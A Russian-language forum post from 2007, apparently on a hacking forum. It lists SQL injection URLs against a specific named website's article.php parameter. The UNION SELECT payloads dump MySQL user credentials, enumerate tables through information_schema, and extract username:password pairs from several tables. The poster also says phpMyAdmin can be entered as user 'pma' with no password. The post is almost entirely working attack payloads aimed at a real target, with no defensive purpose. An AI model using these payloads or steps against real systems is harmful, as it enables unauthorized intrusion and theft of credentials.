22.11.2007, 19:23
|
|
Постоянный
Регистрация: 17.03.2007
Сообщений: 336
С нами:
10080326
Репутация:
576
|
|
Код:
http://www.cgc onn.com/content/article.php?id=-77'+union+select+1,2,user,password,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+mysql.user/*
Интересный логин- pma,логинимся в http://www.cgc onn.com/phpmyadmin под логином pma без пасса)
Код:
http://www.cgc onn.com/content/article.php?id=-77'+union+select+1,2,table_name,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables/*
Таблицы хранятся в другой бд,юзаем переход через точку
Определяем БД
Код:
http://www.cgcon n.com/content/article.php?id=-77'+union+select+1,2,table_schema,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+information_schema.tables+where+table_name='users'/*
Код:
http://www.cg conn.com/content/article.php?id=-77'+union+select+1,2,concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+parts.users+limit+1,10/*
Код:
http://www.cgco nn.com/content/article.php?id=-77'+union+select+1,2,concat(name,0x3a,pass),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21+from+webauth.user_pwd/*
и т.д и т.п |
|
|
|
Предыдущая тема
Следующая тема
|
Здесь присутствуют: 10 (пользователей: 0 , гостей: 10)
|
|
|
|
Древовидный вид